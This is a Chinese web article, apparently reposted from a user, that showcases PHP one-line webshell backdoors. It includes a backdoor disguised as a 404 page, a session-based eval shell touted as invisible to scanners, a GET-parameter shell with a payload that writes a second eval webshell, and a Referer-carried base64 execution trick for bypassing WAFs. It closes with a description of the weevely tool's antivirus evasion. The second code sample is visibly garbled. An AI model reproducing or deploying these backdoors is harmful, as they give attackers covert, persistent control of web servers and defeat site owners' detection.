那些強(qiáng)悍的PHP一句話后門

2024-09-04 11:50:24

字體：大中小

供稿：網(wǎng)友

我們以一個(gè)學(xué)習(xí)的心態(tài)來(lái)對(duì)待這些PHP后門程序，很多PHP后門代碼讓我們看到程序員們是多么的用心良苦。
強(qiáng)悍的PHP一句話后門
這類后門讓網(wǎng)站、服務(wù)器管理員很是頭疼，經(jīng)常要換著方法進(jìn)行各種檢測(cè)，而很多新出現(xiàn)的編寫技術(shù)，用普通的檢測(cè)方法是沒法發(fā)現(xiàn)并處理的。今天我們細(xì)數(shù)一些有意思的PHP一句話木馬。

利用404頁(yè)面隱藏PHP小馬：

Not Found

The requested URL was not found on this server.

<?php@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>

404頁(yè)面是網(wǎng)站常用的文件，一般建議好后很少有人會(huì)去對(duì)它進(jìn)行檢查修改，這時(shí)我們可以利用這一點(diǎn)進(jìn)行隱藏后門。

無(wú)特征隱藏PHP一句話：

<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('/'a/'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[/'theCode/']))','a');

將$_POST['code']的內(nèi)容賦值給$_SESSION['theCode']，然后執(zhí)行$_SESSION['theCode']，亮點(diǎn)是沒有特征碼。用掃描工具來(lái)檢查代碼的話，是不會(huì)報(bào)警的，達(dá)到目的了。

超級(jí)隱蔽的PHP后門：

<?php $_GET[a]($_GET[b]);?>

僅用GET函數(shù)就構(gòu)成了木馬；

利用方法：

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

執(zhí)行后當(dāng)前目錄生成c.php一句話木馬，當(dāng)傳參a為eval時(shí)會(huì)報(bào)錯(cuò)木馬生成失敗，為assert時(shí)同樣報(bào)錯(cuò)，但會(huì)生成木馬，真可謂不可小視，簡(jiǎn)簡(jiǎn)單單的一句話，被延伸到這般應(yīng)用。

層級(jí)請(qǐng)求，編碼運(yùn)行PHP后門：
此方法用兩個(gè)文件實(shí)現(xiàn)，文件1

<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}

文件2

<?php//2.phpheader('Content-type:text/html;charset=utf-8');//要執(zhí)行的代碼$code = << $url, CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_REFERER => $referer);curl_setopt_array($ch, $options);echo curl_exec($ch);
通過HTTP請(qǐng)求中的HTTP_REFERER來(lái)運(yùn)行經(jīng)過base64編碼的代碼，來(lái)達(dá)到后門的效果，一般waf對(duì)referer這些檢測(cè)要松一點(diǎn)，或者沒有檢測(cè)。用這個(gè)思路bypass waf不錯(cuò)。

PHP后門生成工具weevely

weevely是一款針對(duì)PHP的webshell的自由軟件，可用于模擬一個(gè)類似于telnet的連接shell，weevely通常用于web程序的漏洞利用，隱藏后門或者使用類似telnet的方式來(lái)代替web 頁(yè)面式的管理，weevely生成的服務(wù)器端php代碼是經(jīng)過了base64編碼的，所以可以騙過主流的殺毒軟件和IDS，上傳服務(wù)器端代碼后通?？梢酝ㄟ^weevely直接運(yùn)行。

weevely所生成的PHP后門所使用的方法是現(xiàn)在比較主流的base64加密結(jié)合字符串變形技術(shù)，后門中所使用的函數(shù)均是常用的字符串處理函數(shù)，被作為檢查規(guī)則的eval，system等函數(shù)都不會(huì)直接出現(xiàn)在代碼中，從而可以致使后門文件繞過后門查找工具的檢查。使用暗組的Web后門查殺工具進(jìn)行掃描，結(jié)果顯示該文件無(wú)任何威脅。

以上是大概介紹下邊是截圖，相關(guān)使用方法亦家就不在這介紹了，簡(jiǎn)單的科普一下。